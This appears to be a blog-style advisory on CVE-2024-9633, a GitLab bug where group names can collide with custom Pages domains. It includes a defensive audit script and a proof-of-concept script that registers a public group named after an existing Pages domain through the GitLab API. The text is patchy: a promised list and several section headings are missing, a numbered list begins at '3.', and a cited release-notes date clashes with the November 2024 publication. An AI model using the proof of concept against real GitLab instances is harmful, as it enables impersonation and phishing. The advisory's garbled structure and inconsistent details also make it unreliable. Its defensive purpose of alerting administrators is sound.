A recently disclosed security vulnerability—CVE-2024-9633—affects multiple versions of GitLab Community Edition (CE) and Enterprise Edition (EE). This flaw could let an attacker confuse users by abusing similarities between GitLab group names and existing Pages domains.
If you use GitLab for hosting projects, websites, or documentation, this vulnerability puts trust in you or your project at risk. In this article, you'll find out:
17.5 up to, but not including, 17.5.2
If you’re running any of the versions above, update immediately.
Official documentation:
🔗 GitLab Security Release: 17.5.2, 17.4.4, and 17.3.7
What’s the Problem? (In Plain English)
Many companies and open-source communities host project websites using GitLab Pages. Each group's website usually gets a subdomain based on its group/project name, like:
https://mygroup.gitlab.io
GitLab is supposed to prevent anyone from creating a group with a name that'd conflict with currently used custom domains. But due to CVE-2024-9633, a malicious actor can:
Use this overlap to confuse users or impersonate legitimate pages.
3. Possibly trick users into visiting a lookalike site, making it easier to carry out phishing or malware attacks.
For example, if there's an existing custom domain like superteam.dev set up via GitLab Pages, this bug may let someone create a group named superteam.dev and deliberately trigger confusion.
```
https://gitlab.com/data-proj.docs.com/fakesite
https://data-proj.docs.com.gitlab.io/
```
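As an added example that is not part of the original article, the following Python audit flags existing groups whose path collides with a custom GitLab Pages domain, the overlap described above. The group paths and Pages domains are constructed sample data standing in for what you would pull from your instance (group paths from `/api/v4/groups`, domains from your Pages configuration); the `gitlab.io` Pages host is assumed from the article's examples.

```python
import re

# Constructed sample input standing in for data pulled from a GitLab instance:
# group paths (as returned by GET /api/v4/groups) and the instance's custom
# Pages domains. All names here are made up for this example.
SAMPLE_GROUP_PATHS = [
    "superteam.dev",        # exact match with a custom Pages domain
    "Data-Proj.Docs.com",   # matches a domain, differing only in case
    "mygroup",              # ordinary group name, no dot
    "internal-tools",
]
SAMPLE_PAGES_DOMAINS = [
    "superteam.dev",
    "data-proj.docs.com.",  # trailing dot, as some DNS exports write it
    "docs.example.org",
]

# Hostname shape: at least two dot-separated labels of letters, digits, hyphens
DOMAIN_RE = re.compile(r"[a-z0-9-]+(\.[a-z0-9-]+)+")


def normalize_domain(name):
    """Lower-case a hostname and drop a trailing dot so comparisons are exact."""
    return name.strip().rstrip(".").lower()


def pages_url_for(group_path, pages_host="gitlab.io"):
    """URL a group's Pages site would be served from on the given Pages host (assumed gitlab.io)."""
    return "https://%s.%s/" % (normalize_domain(group_path), pages_host)


def find_domain_collisions(group_paths, pages_domains):
    """Return (group_path, pages_domain) pairs where a group path equals a
    custom Pages domain, the overlap CVE-2024-9633 allows."""
    by_key = {normalize_domain(d): d for d in pages_domains}
    return [(p, by_key[normalize_domain(p)])
            for p in group_paths if normalize_domain(p) in by_key]


def domain_shaped_groups(group_paths):
    """Group paths that look like a hostname, worth reviewing even when no
    current Pages domain matches them."""
    return [p for p in group_paths if DOMAIN_RE.fullmatch(p.lower())]


if __name__ == "__main__":
    for path, domain in find_domain_collisions(SAMPLE_GROUP_PATHS, SAMPLE_PAGES_DOMAINS):
        print("COLLISION: group %r vs Pages domain %r (%s)" % (path, domain, pages_url_for(path)))
    print("Review:", domain_shaped_groups(SAMPLE_GROUP_PATHS))
```

Run it against your own group and domain lists; any collision it reports is a group that an unpatched instance should never have allowed to exist.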
Proof-of-Concept Snippet
The exploit itself is low-effort and does not require complex scripting. Here’s a simple walkthrough using the GitLab API:
```python
import requests

# GitLab REST endpoint for creating groups
GITLAB_URL = "https://gitlab.com/api/v4/groups"
TOKEN = "YOUR_PERSONAL_ACCESS_TOKEN"  # personal access token with the api scope

# Group whose path matches an existing custom Pages domain
group_data = {
    "name": "superteam.dev",
    "path": "superteam.dev",
    "visibility": "public",
}
headers = {"Private-Token": TOKEN}

resp = requests.post(GITLAB_URL, headers=headers, data=group_data)
if resp.status_code == 201:
    print("Group created:", resp.json()["web_url"])
else:
    print("Failed:", resp.status_code, resp.text)
```
> Note: Whether this actually produces confusion or a redirect depends on the GitLab Pages settings and on whether a Pages registration for that domain already exists.
17.5.2 (or any newer release)
Read the official advisory from GitLab:
🔗 CVE-2024-9633 at GitLab Security Portal
For a simple check to see if your instance is affected, run:
```
gitlab-rake gitlab:env:info
```
Look for the GitLab version in the output.
- Warn users about potential lookalike sites.
- Always verify the domain (and TLS certificate) in your browser bar before signing in or entering data on a GitLab Pages site.
References
- GitLab Security Release Notes: 2024-03-14
- CVE Page at NIST NVD
- GitLab Documentation on Groups and Pages
Summary
CVE-2024-9633 is a severe but easily fixed domain confusion bug affecting several recent GitLab versions. It allows anyone to create groups that overlap with existing custom Pages domains, opening the door for phishing and brand impersonation.
Timeline
Published on: 11/14/2024 14:15:19 UTC
Last modified on: 11/15/2024 13:58:08 UTC